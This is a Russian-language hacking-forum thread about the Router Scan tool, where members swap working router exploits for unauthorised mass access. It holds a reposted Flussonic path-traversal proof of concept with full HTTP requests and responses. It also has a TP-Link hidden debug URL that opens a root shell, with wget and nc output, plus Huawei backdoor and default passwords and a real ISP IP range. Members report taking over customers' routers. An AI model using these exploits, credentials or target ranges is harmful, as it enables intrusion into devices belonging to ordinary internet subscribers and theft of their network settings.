прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    567
    Likes Received:
    734
    Reputations:
    2
    опять форум в дауне :) кстати госопда гуру, ни у кого случайно не завалялся эксплойтик по обходу аутентификации для хом гатевей? есть только отдельными скриптами. а напрямую запросами из браузера не нашел.
     
    1. Triton_Mgn

      Triton_Mgn Elder - Старейшина

      Joined:
      6 Jul 2015
      Messages:
      3,673
      Likes Received:
      5,775
      Reputations:
      51
      Я об ней не знать, так бы помог.
      Ну эта тема не весь форум, согласен с binarymaster лучше, но пока он отсутствует мы копим уязвимости для RS, ничего более не остается , так что не грусти.
      Felis-Sapiens тоже гуру, может и немного в разных направлениях, но все равно.
      RS - все сильнее.
       
      sha9, VladimirV and CRACK211 like this.
      1. CRACK211

        CRACK211 Elder - Старейшина

        Joined:
        16 Sep 2009
        Messages:
        1,045
        Likes Received:
        1,127
        Reputations:
        11
        Вопрос к гуру) есть ли надежда на то что вы выпустите lite версию программы? Для запуска в дальнейшем на андроид устройствах через эмулятор) lite версия с миним функций для уменьшения нагрузки на процессор и память) но с тем же количеством эксклоитов)
         
        VladimirV likes this.
        1. shell_c0de

          shell_c0de Hack All World

          Joined:
          7 Jul 2009
          Messages:
          1,144
          Likes Received:
          616
          Reputations:
          690
          Читал в этой ветке ссылку где ip всех стран можно спарсить по прову, не могу найти, скиньте кому не влом)
          P.S и еще поделитесь норм словариком именно под RS) мона и в ПМ)
           
          _________________________
          1. CRACK211

            CRACK211 Elder - Старейшина

            Joined:
            16 Sep 2009
            Messages:
            1,045
            Likes Received:
            1,127
            Reputations:
            11
            https://forum.antichat.ru/threads/427913/
             
            sha9 and shell_c0de like this.
            1. TOX1C

              TOX1C Elder - Старейшина

              Joined:
              24 Mar 2012
              Messages:
              1,135
              Likes Received:
              1,931
              Reputations:
              24
              Скажем дружно на*** нужно. Через кривой эмулятор, с неудобным упарвлением, без нормального лекарства это не вариант. Нужно пилить нативное приложение под ведро. На мобильных устройствах есть свои плюсы, минусы и особенности работы такого софта. Навскидку:
              1) Обычно сканируется локальная сеть - есть проблема с регулярной переделкой списка ip для сканирования
              2) Интернет на мобильном устройстве - это не витая пара, а слабый и нестабильный вайфай, что тоже нужно учесть.
               
              sha9 and binarymaster like this.
              1. CRACK211

                CRACK211 Elder - Старейшина

                Joined:
                16 Sep 2009
                Messages:
                1,045
                Likes Received:
                1,127
                Reputations:
                11
                У каждого свои нужды) и через wifi все нормально работает, если без фанатизма ) и таскать ноутбук не всегда удобно. А телефон с планшетом всегда под рукой и просканировать небольшой диапазон всегда можно) очень удобно, пускай не 1000ми гудов в день. Но несколько десятков гудов в день насканить можно)
                 
                1. Nem0

                  Nem0 New Member

                  Joined:
                  28 Nov 2015
                  Messages:
                  30
                  Likes Received:
                  4
                  Reputations:
                  0
                  У меня на ура эти Thomson/Technicolor отдавали настройки в большинстве случаев там такая комбинация<empty>:admin насканировал в свое время дофига таких
                   
                  sha9 likes this.
                  1. sha9

                    sha9 Well-Known Member

                    Joined:
                    25 Sep 2015
                    Messages:
                    567
                    Likes Received:
                    734
                    Reputations:
                    2
                    что значит не грусти? без вас скучно :) я согласен, что РС сильнее. и это радует. и внушает некоторое удовлетворение маленькой причастности к такому знаменательному труду. глядишь - наш великий О'SENSEI - binarymaster свою лабораторию пентеста организует. и нас как тестеров не забудет :) :) :)
                    кстати - спасибо Triton_Mgn. я ничуть не сомневался в вас :) я давно уже знаю, что с вами смело можно идти в разведку (без иронии) :)
                    теперь серьезно и по теме. HuaweiHomeGateway особенно много встречается на порту 7547. недавно наткнулся. провы порты прячут :) раньше по этой сетке ходил но на стандартных портах. думал, что в удаленке нет роутеров. а тут вдруг попробовал нестандартные порты и нашел неимоверное количество этих хомов. но эксплойты в основном через метасплойт. интересно было бы найти что-то ближе к роутерскану. может кто встречал и поделится во имя общего блага ?
                     
                    Payer and Triton_Mgn like this.
                    1. sha9

                      sha9 Well-Known Member

                      Joined:
                      25 Sep 2015
                      Messages:
                      567
                      Likes Received:
                      734
                      Reputations:
                      2
                      кстати, порадовала еще одна фишка - экспериментировал с роутерсканом и увидел одну приятную мелочь (я во всяком случае об этом не знал). уменьшил количество потоков до 50 ( обычно уменьшал всегда до 130) и количество найденных роутеров увеличилось по одному и тому же провайдеру
                       
                      TOX1C, CRACK211, Upsurt and 2 others like this.
                      1. sha9

                        sha9 Well-Known Member

                        Joined:
                        25 Sep 2015
                        Messages:
                        567
                        Likes Received:
                        734
                        Reputations:
                        2
                        на счет Felis-Sapiens даже вопросов быть не может.гуру с большой буквы. но тоже без binarymaster редко ветку посещает :-( .
                        ну да ладно. копим - так копим :)
                        как-то тут поднимался вопрос по поводу Flussonic. вот нарыл эксплойты, правда пока не разобрался с ними до конца. не знаю, можно ли его будет прикрутить к роутерскану. вроде по http работают.буду пробовать. эти соники частенько попадаются при сканировании РСк. жалко их оставлять без внимания :)
                        Document Title:
                        ============
                        Flussonic Media Server Multiple Vulnerabilities

                        Release Date:
                        ===========
                        June 29, 2014

                        Product & Service Introduction:
                        ========================
                        Flussonic is a mutli-protocol streaming server with support for many protocols, including HDS, HLS, RTMP, RTSP, HTTP, MPEG-TS. Flussonic has the capability of capturing multimedia from external sources, such as video cameras, satellite TV and other multimedia servers (Wowza, Flash Media Server and Red5).

                        Flussonic operates on the highly flexible and fast Erlang platform that facilitates impressive performance during parallel data processing, failure safety for servers, and scaling options up to a sophisticated distributed data network.

                        Abstract Advisory Information:
                        =======================
                        BGA Security Team discovered an arbitrary file read and arbitrary directory listing vulnerability in Flussonic Media Server 4.3.3

                        Vulnerability Disclosure Timeline:
                        =========================
                        June 26, 2014 : Contact with Vendor
                        June 26, 2014 : Vendor Response
                        June 26, 2014 : Version 4.3.4 Deployed
                        June 29, 2014 : Public Disclosure

                        Discovery Status:
                        =============
                        Published

                        Affected Product(s):
                        ===============
                        Erlyvideo, LLC
                        Product: Flussonic Media Server 4.1.25 - 4.3.3

                        Exploitation Technique:
                        ==================
                        AFR: Remote, Unauthenticated
                        ADL: Remote, Authenticated

                        Severity Level:
                        ===========
                        High

                        Technical Details & Description:
                        ========================
                        1. Arbitrary File Read (Unauthenticated)
                        It’s possible to read any files from the server (with the application’s user’s permissions) by a simple HTTP GET request. Flussonic’s web interface login information can be found as plaintext by reading /etc/flussonic/flussonic.conf; thus, it’s possible to login any Flussonic web interface using that method.

                        2. Arbitrary Directory Listing (Authenticated)
                        It’s possible to list any directories’ content sending a HTTP GET request to “flussonic/api/list_files” with the parameter “subpath=directory”.


                        Proof of Concept (PoC):
                        ==================
                        Proof of Concept AFR Request & Response:

                        GET /../../../etc/flussonic/flussonic.conf HTTP/1.1
                        Host: 6.6.6.100:8080
                        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Accept-Encoding: gzip, deflate
                        Connection: keep-alive

                        HTTP/1.1 200 OK
                        Connection: keep-alive
                        Server: Cowboy
                        Date: Thu, 26 Jun 2014 09:50:57 GMT
                        Content-Length: 191
                        Content-Type: text/plain
                        Last-Modified: Tue, 24 Jun 2014 22:10:53 GMT
                        Etag: 1452b98181c562b2e2d041a3e1fe2af0cffe8687

                        # Default ports Flussonic M1 Media server listens on
                        http 80;
                        http 8080;
                        rtmp 1935;
                        rtsp 554;
                        pulsedb /var/run/flussonic;
                        edit_auth flussonic letmein!;

                        live mylive;

                        file vod {
                        path priv;
                        }

                        2. Proof of Concept ADR Request & Response:

                        GET /flussonic/api/list_files?subpath=../../../etc HTTP/1.1
                        Host: 6.6.6.100:8080
                        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Accept-Encoding: gzip, deflate
                        Authorization: Basic Zmx1c3NvbmljOmxldG1laW4h
                        Connection: keep-alive

                        HTTP/1.1 200 OK
                        Connection: keep-alive
                        Server: Cowboy
                        Date: Thu, 26 Jun 2014 11:04:12 GMT
                        Content-Length: 7555
                        X-Route-Time: 28
                        X-Run-Time: 8090
                        Content-Type: application/json

                        {“files":[{"name":"X11","type":"directory"},{"name":"acpi","type":"directory"},{"name":"adduser.conf","type":"file","prefix":"vod"},{"name":"alternatives","type":"directory"},{"name":"apache2","type":"directory"},{"name":"apm","type":"directory"},
                        ………
                        {“name":"xml","type":"directory"},{"name":"zsh_command_not_found","type":"file","prefix":"vod"}]}



                        Security Risk:
                        ==========
                        The risk of the vulnerabilities above estimated as high and medium.

                        Credits & Authors:
                        ==============
                        Bilgi Güvenliði Akademisi
                        Тип воздействия:
                        Раскрытие важных данных
                        Раскрытие системных данных
                         
                        #2151 sha9, 27 Apr 2016
                        Last edited: 27 Apr 2016
                        CRACK211 and Payer like this.
                        1. sha9

                          sha9 Well-Known Member

                          Joined:
                          25 Sep 2015
                          Messages:
                          567
                          Likes Received:
                          734
                          Reputations:
                          2
                          в догон. :) проводил тут на днях проверку провайдеров. пришел к выводу - если найдем способ подобраться к HuaweiHomeGateway работающих на 7547 порту - результаты сканирования увеличатся в разы. ряд провайдеров целые ветки прячут на этом порту. видимо энтузиасты RS достали до печенок :)
                           
                          1. sha9

                            sha9 Well-Known Member

                            Joined:
                            25 Sep 2015
                            Messages:
                            567
                            Likes Received:
                            734
                            Reputations:
                            2
                            экспериментировал сегодня с HuaweiHomeGateway и роутерсканом. выяснил одну маленькую вещь - пассы провайдер на все гетвэи ставит дефолтные - root:admin. при скане роутерскан их не определяет. в браузере пасс принимается, но страницу настроек не выдает во внешнюю сеть. как-то так получается. потому роутерскан и не выдает гуды по ним. будем копать дальше :)
                             
                            CRACK211 and Triton_Mgn like this.
                            1. Triton_Mgn

                              Triton_Mgn Elder - Старейшина

                              Joined:
                              6 Jul 2015
                              Messages:
                              3,673
                              Likes Received:
                              5,775
                              Reputations:
                              51
                              Копайте мистер копайте,
                              RS не всевидящий же , тоже было замечено почему спарсенная пара логин пароль не выдает внутренности,
                               
                              sha9 likes this.
                              1. freee

                                freee Active Member

                                Joined:
                                8 Aug 2015
                                Messages:
                                212
                                Likes Received:
                                227
                                Reputations:
                                4
                                В своей сети попадаются такие, на сайте оператора нет прошивок к ним, методом отсеивания выбрал 4 модели с сайта производителя. благо их там не много, в прошивках одинаковые shadow , расшифровка дала лог\пас root:root , значит у вашего провайдера своя прошивка или он сам меняет пас.
                                Можете поделиться ip диапазоном с HuaweiHomeGateway, хочется в прошивке покапать.
                                И еще 7547 порт это CWMP говорит wiki, как с ним общаться кто знает?
                                Также попадаются Netgear EVG1500 CPE (Есть ли у кого прошивка?) и SERCOMM CPE - что за зверь?
                                 
                                CRACK211 and sha9 like this.
                                1. sha9

                                  sha9 Well-Known Member

                                  Joined:
                                  25 Sep 2015
                                  Messages:
                                  567
                                  Likes Received:
                                  734
                                  Reputations:
                                  2
                                  привет triton :) вот нарыл интересный эксплойтик на туполинки
                                  http://IP/userRpmNatDebugRpm26525557/start_art.html
                                  пример как тут
                                  root@secu:~# ls -l /srv/tftp/nart.out
                                  -rw-r--r-- 1 root root 871604 Mar 11 18:23 /srv/tftp/nart.out
                                  root@secu:~# nc 192.168.0.1 2222
                                  (UNKNOWN) [192.168.0.1] 2222 (?) : Connection refused
                                  root@secu:~# wget http://192.168.0.1/userRpmNatDebugRpm26525557/start_art.html --2013-03-09 23:22:31-- http://192.168.0.1/userRpmNatDebugRpm26525557/start_art .html
                                  Connecting to 192.168.0.1:80... connected.
                                  HTTP request sent, awaiting response... 200 OK
                                  Length: unspecified [text/html]
                                  Saving to: "start_art.html"

                                  [ <=> ] 426 --.-K/s in 0s

                                  2013-03-09 23:22:33 (49.1 MB/s) - "start_art.html" saved [426]

                                  root@secu:~# nc 192.168.0.1 2222
                                  ps
                                  PID Uid VmSize Stat Command
                                  1 root 404 S init
                                  2 root SW< [kthreadd]
                                  3 root SW< [ksoftirqd/0]
                                  4 root SW< [events/0]
                                  5 root SW< [khelper]
                                  6 root SW< [async/mgr]
                                  7 root SW< [kblockd/0]
                                  8 root SW [pdflush]
                                  9 root SW [pdflush]
                                  10 root SW< [kswapd0]
                                  17 root SW< [mtdblockd]
                                  18 root SW< [unlzma/0]
                                  71 root 2768 S /usr/bin/httpd
                                  76 root 380 S /sbin/getty ttyS0 115200
                                  78 root 208 S ipcserver
                                  82 root 2768 S /usr/bin/httpd
                                  83 root 2768 S /usr/bin/httpd
                                  86 root 732 S ushare -d -x -f /tmp/ushare.conf
                                  92 root 348 S syslogd -C -l 7
                                  96 root 292 S klogd
                                  101 root SW< [napt_ct_scan]
                                  246 root 348 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
                                  247 root 204 S /sbin/udhcpc -h TL-WDR4300 -i eth0.2 -p /tmp/wr841n/u
                                  251 root 364 S /usr/sbin/udhcpd /tmp/wr841n/udhcpd.conf
                                  286 root 2768 S /usr/bin/httpd
                                  299 root 2768 S /usr/bin/httpd
                                  300 root 2768 S /usr/bin/httpd
                                  305 root 2768 S /usr/bin/httpd
                                  307 root 2768 S /usr/bin/httpd
                                  309 root 2768 S /usr/bin/httpd
                                  310 root 2768 S /usr/bin/httpd
                                  389 root 2768 S /usr/bin/httpd

                                  подключается по арт и кажется можно выдрать настройки. еще не пробовал. пробовал только подключаться. написано было что работает с туполинками TL-WDR4300; TL-WR743ND (v1.2 v2.0)
                                  но я тестил и на TP-LINK TL-WR843ND; TP-LINK TL-WR940N которые роутерскан не спарсил в гуды. подключение пошло. значит можно играть дальше :) может к возвращению наших гуру binarymaster и Felis-Sapiens что нибудь стоящее для модернизации роутерскана и соберем :)


                                   
                                  CRACK211 likes this.
                                  1. sha9

                                    sha9 Well-Known Member

                                    Joined:
                                    25 Sep 2015
                                    Messages:
                                    567
                                    Likes Received:
                                    734
                                    Reputations:
                                    2
                                    ну например этот
                                    178.168.78.1-178.168.79.254
                                    на 7547 порту их валом. как я и говорил - провайдер на все хювеи ставит пароль root:admin. но вот как до прошивки добраться - пока не знаю :)

                                    по поводу SWMP нашел одну интересную статейку. по крайней мере стало понятно почему не дает настройки. http://byfly.ws/instrukcii/4923-otklyuchaem-cwmp-kontrol-nad-modemami-promsvyaz-zte.html
                                     
                                    #2157 sha9, 28 Apr 2016
                                    Last edited: 28 Apr 2016
                                    CRACK211 likes this.
                                    1. Ossen

                                      Ossen Active Member

                                      Joined:
                                      4 Jun 2015
                                      Messages:
                                      229
                                      Likes Received:
                                      155
                                      Reputations:
                                      0
                                      Побробуйте такую комбинацию telecomadmin:NWTF5x%RaK8mVbD
                                       
                                      sha9 likes this.
                                      1. sha9

                                        sha9 Well-Known Member

                                        Joined:
                                        25 Sep 2015
                                        Messages:
                                        567
                                        Likes Received:
                                        734
                                        Reputations:
                                        2
                                        на Huawei HG8245C и HuaweiHomeGateway не подошли.
                                         
                                        Triton_Mgn likes this.
                                        1. sha9

                                          sha9 Well-Known Member

                                          Joined:
                                          25 Sep 2015
                                          Messages:
                                          567
                                          Likes Received:
                                          734
                                          Reputations:
                                          2
                                          backdoor в некоторых моделях Huawei HG8245
                                          менедж аккаунт

                                          admin:*6P0N4dm1nP4SS*

                                          а также по умолчанию

                                          root:admin

                                          подробности тут
                                          The Huawei HG8245 ONT, firmware version V1R006C00S100 which provides cellular services, contains 3 severe vulnerabilities: two administrator accounts enabled by default and a public administration interface exposed to the Internet.
                                          The backdoor is a web management account enabled by default and the password cannot be changed. In this version the default administrator password is:
                                          admin:*6P0N4dm1nP4SS*
                                          Another administrator user exists by default for the telnet service:
                                          root:admin

                                          ссылка http://websec.ca/advisories/view/Huawei-web-backdoor-and-remote-access
                                          это конечно старенькая дырочка, но может кому-то пригодится. не все же тут хакеры со стажем :cool: есть и начинающие хац... пардон - пентестеры :);)
                                          и кстати из проверенных мной вчера 32 Huawei HG8245С и Huawei HG8245H, 27 отдали настройки по рут-админ. только роутерскан их не спарсил видимо из-за того, что страница настроек грузится очень долго. и пока дойдет дело до этой пары роутер в локе
                                           
                                          #2160 sha9, 29 Apr 2016
                                          Last edited: 29 Apr 2016
                                          Ossen and Payer like this.